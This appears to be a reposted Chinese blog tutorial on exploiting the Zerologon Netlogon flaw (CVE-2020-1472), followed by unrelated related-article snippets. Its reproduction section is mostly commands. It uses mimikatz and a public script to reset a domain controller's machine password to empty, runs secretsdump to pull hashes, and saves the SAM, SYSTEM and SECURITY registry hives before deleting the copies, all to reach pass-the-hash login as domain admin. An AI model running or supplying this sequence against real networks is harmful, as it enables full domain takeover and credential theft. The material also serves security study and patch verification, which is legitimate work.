域渗透之Zerologon域提权漏洞

域渗透之Zerologon域提权漏洞组件概述Netlogon远程协议是一个远程过程调用(RPC)接口,用于基于域的网络上的用户和计算机身份验证。Netlogon远程协议RPC接口还用于为备份域控制

大家好,又见面了,我是全栈君,祝每个程序员都可以多学几门语言。

域渗透之Zerologon域提权漏洞

组件概述

Netlogon远程协议是一个远程过程调用(RPC)接口,用于基于域的网络上的用户和计算机身份验证。Netlogon远程协议RPC接口还用于为备份域控制器(BDC)复制数据库。

Netlogon远程协议用于维护从域成员到域控制器(DC),域的DC之间以及跨域的DC之间的域关系。此RPC接口用于发现和管理这些关系。

漏洞概述

该漏洞主要是由于在使用Netlogon安全通道与域控进行连接时,由于认证协议加密部分的缺陷,导致攻击者可以将域控管理员用户的密码置为空,从而进一步实现密码hash获取并最终获得管理员权限。成功的利用可以实现以管理员权限登录域控设备,并进一步控制整个域。

漏洞范围

Microsoft Windows Server 2008 R2 SP1

Microsoft Windows Server 2012

Microsoft Windows Server 2012 R2

Microsoft Windows Server 2016

Microsoft Windows Server 2019

Microsoft Windows Server version 2004 (Server Core Installation)

Microsoft Windows Server version 1903 (Server Core Installation)

Microsoft Windows Server version 1909 (Server Core Installation)

影响Windows Server 2008R 2至Windows Server 2019的多个版本系统

漏洞复现

privilege::debug

# 检测是否存在漏洞
lsadump::zerologon /target:<dc-ip> /account:<主机名>$

# 重置密码
lsadump::zerologon /target:<dc-ip> /account:<主机名>$ /exploit

或使用脚本

python3 cve-2020-1472-exploit.py -n server2012 -t 10.211.55.12

-n指定域控计算机主机名

-t指定域控ip

运行exp,确定把域控机器账户密码置换成空

完成后使用

python secretsdump.py 域名/ADD-DC$@192.168.11.15 -no-pass

拖hash,获取域管hash后使用psexec等进行pth登录

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save

# 获取文件路径
get system.saveget sam.save
get security.save 

# 删除文件
del /f system.save
del /f sam.save
del /f security.save

解密本地凭据

python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

域渗透之Zerologon域提权漏洞

$MACHINE.ACC: 的值,然后使用reinstall_original_pw.py进行还原凭据

python3 reinstall_original_pw.py Motoo-DCSRV 192.168.159.149 ce7b34c0f2c72d6cb03123ef5ff741ca

机器名可通过nslookup 或nbtscan等netbios扫描获取

参考

CVE-2020-1472 Netlogon权限提升漏洞分析

CVE-2020-1472 Zerologon

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/119829.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长


相关推荐

  • 对“全栈工程师”一词的理解

    对“全栈工程师”一词的理解纵使目标再大 人的精力有限 于我来说 早些时候远大目标隐约是 成功的软件工程师 这个样子 但是目标是需要逐渐细化的 这些年我渐渐对自己的定位和未来有了一个清晰一点的认识 确实我有很强的观点 觉得软件工程师需要有足够的全面性 在 我眼中的工程师文化 中我也说 工程师文化 不是只有权力的一面 它对工程师的要求 是每个人都要足够能干 都要做许多的事 但是 全面性不代表没有专精 没有方向 深度和广度统一的问题已经有许许多多过往的人和我说过了 不存在一个在某一领域精深的牛人但是知识却很窄 也不存在一个

    2025年11月21日
    4
  • arm rootfs定制[通俗易懂]

    arm rootfs定制[通俗易懂]最近在做rk3288的OS定制,因此将过程中遇到的问题记录下来。本文主要记录ubuntu18.04rootfs制作过程。参考文档:http://opensource.rock-chips.com/wiki_Distribution1.准备步骤获取ubuntubase18.04.3,路径:http://cdimage.ubuntu.com/ubuntu-base/releases…

    2022年10月6日
    3
  • 微信公众号是html页面吗,微信公众号网页开发

    微信公众号是html页面吗,微信公众号网页开发基本配置1.设置—公众号设置—功能设置—配置JS接口安全域名安全域名配置规则如下2.开发—基本配置开发者密码第一次使用需要重新设置记录开发者ID(AppID)开发者密码(AppSecret)后面会用到3.IP白名单配置推荐填写当前本地开发IP地址和服务器IP地址本地开发地址获取方式服务器IP地址(根据自己的服务器Ip地址自行填写)多个IP地址填写用回车隔开4重要的一步在:微信公众号-开发-接…

    2022年6月6日
    32
  • Linux 的 history 命令使用大全

    Linux 的 history 命令使用大全history命令history命令:用于显示历史记录和执行过的指令命令。history命令读取历史命令文件中的目录到历史命令缓冲区和将历史命令缓冲区中的目录写入命令文件。该命令单独使用时,仅显示历

    2022年7月4日
    24
  • 算法基础课acwing下载_十进制数135转换为八进制数

    算法基础课acwing下载_十进制数135转换为八进制数杭州人称那些傻乎乎粘嗒嗒的人为 62(音:laoer)。杭州交通管理局经常会扩充一些的士车牌照,新近出来一个好消息,以后上牌照,不再含有不吉利的数字了,这样一来,就可以消除个别的士司机和乘客的心理障碍,更安全地服务大众。不吉利的数字为所有含有 4 或 62 的号码。例如:62315,73418,88914 都属于不吉利号码。但是,61152 虽然含有 6 和 2,但不是 连号,所以不属于不吉利数字之列。你的任务是,对于每次给出的一个牌照号区间 [n,m],推断出交管局今后又要实际上给多少辆新的士车上牌

    2022年8月11日
    8
  • 如何查看redis版本号[通俗易懂]

    如何查看redis版本号[通俗易懂]Windows下查看redis版本号1、打开redis所在目录启动redis-server服务器端。2、启动redis-cli客户端。3、客户端输入:info结果如下:linux下查看redis的版本号linux下查看redis的版本有两种方式:1、查看服务端版本**二者都可以**redis-server–versionredis-server-v输出:2、查看客户端版本**二者都可以**redis-cli-vredis-cli–versio.

    2022年6月12日
    64

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号